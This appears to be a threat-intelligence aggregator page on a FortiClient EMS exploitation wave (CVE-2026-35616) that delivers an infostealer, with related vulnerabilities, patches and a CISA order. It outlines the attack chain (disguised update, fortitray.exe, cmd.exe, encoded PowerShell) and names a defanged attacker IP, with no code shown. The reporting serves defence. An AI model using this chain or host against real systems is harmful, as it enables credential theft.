Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

FortiClient EMS CVE-2026-35616 exploitation wave

Exploitation Wave
First reported
Last updated
Happening score
H score 56
2 unique sources, 2 articles

Summary

Hide ▲

CVE-2026-35616 exploitation in FortiClient Enterprise Management Server (EMS) is being used to deliver the undocumented credential stealer EKZ. Attackers are abusing unauthenticated API access and FortiClient-managed VPN scripting workflows to disguise the payload as a Fortinet endpoint update, launch malicious scripts through fortitray.exe and cmd.exe, and exfiltrate stolen data to an attacker-controlled VPS over HTTP. Fortinet released emergency hotfixes for 7.4.5 and 7.4.6, CISA ordered federal agencies to secure affected instances, and The Shadowserver Foundation reported 2,000 internet-exposed EMS instances.

Cases

FortiClient EMS CVE-2026-35616 exploitation and stealer delivery (2)

Related Happenings

EKZ Infostealer delivered through FortiClient EMS abuse

Malware Activity
First: 28.05.2026 20:25 Last: 28.05.2026 20:25 Sources 1

How related: The downloaded payload, tracked as EKZ Infostealer, features fairly standard information-stealing functionality.

About this happening: A new **EKZ Infostealer** delivery chain is using **FortiClient EMS** abuse to silently install a credential stealer and siphon browser data from affected endpoints. The malware i...

Open Happening

Apex One on-premises server directory traversal zero-day (CVE-2026-34926)

Vulnerability
First: 22.05.2026 16:39 Last: 22.05.2026 16:39 Sources 1

About this happening: **CVE-2026-34926** is a **Trend Micro Apex One** **on-premises** directory traversal zero-day that can let a privileged local attacker inject malicious code onto affected **agents...

Open Happening

Fortinet security patch release for CVE-2026-44277

Security Patch Release
First: 12.05.2026 21:23 Last: 12.05.2026 21:23 Sources 1

About this happening: Fortinet released **security updates** for **FortiSandbox** and **FortiAuthenticator** to fix **two critical vulnerabilities** that could let an **unauthenticated attacker** execu...

Open Happening

Fortinet FortiClient EMS emergency patch release (CVE-2026-35616, CVE-2026-21643)

Security Patch Release
First: 07.04.2026 12:26 Last: 07.04.2026 12:26 Sources 1

How related: The issue was addressed by Fortinet in FortiClient EMS 7.4.7 and later.

About this happening: **Fortinet FortiClient EMS** is a **security-patch release** happening centered on **CVE-2026-35616** and **CVE-2026-21643**. Fortinet issued an **out-of-band emergency hotfix** a...

Latest development: 28.05.2026 18:26

Arctic Wolf observed threat actors abusing FortiClient Endpoint Management Server (EMS) and CVE-2026-35616 in May 2026 to modify EMS-managed configuration, disguise FortiEndpoint_Patch.exe as a Fortinet endpoint update, and use fortitray.exe, cmd.exe, and a Base64-encoded PowerShell chain to download malware and exfiltrate browser data to 83.138.53[.]110.

Open Happening

CISA KEV listing and FCEB patch order for CVE-2026-35616

Public Sector Action
First: 06.04.2026 19:02 Last: 06.04.2026 19:02 Sources 1

About this happening: **CISA** added **CVE-2026-35616** to the **KEV Catalog** and ordered **FCEB agencies** to patch **FortiClient EMS** by **Thursday midnight, April 9**. The mandate matters because...

Open Happening

Timeline

  1. 28.05.2026 18:26 3 articles · 4h ago

    Initial report: FortiClient EMS CVE-2026-35616 exploitation wave

    Initial Disclosure

    By **May 2026**, attackers were using a patched **FortiClient EMS** flaw to push malicious scripts through the product's management path. The early phase centered on abusing EMS controls to reach every managed endpoint from a privileged context.

    Show sources
    Open in new tab